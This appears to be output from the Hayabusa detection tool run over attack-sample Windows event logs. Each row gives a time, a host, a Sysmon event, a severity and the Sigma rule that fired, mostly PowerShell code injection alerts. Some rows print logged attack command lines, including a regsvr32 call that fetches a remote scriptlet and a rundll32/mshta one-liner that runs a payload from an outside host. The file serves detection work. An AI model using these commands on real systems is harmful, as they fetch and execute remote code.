Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid : Command: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js : Path: C:\ProgramData\winpm.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories : Command: attrib +h nbtscan.exe : Path: C:\Windows\System32\attrib.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx -2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx -2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" : Path: C:\Users\IEUser\Downloads\com-hijack.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process 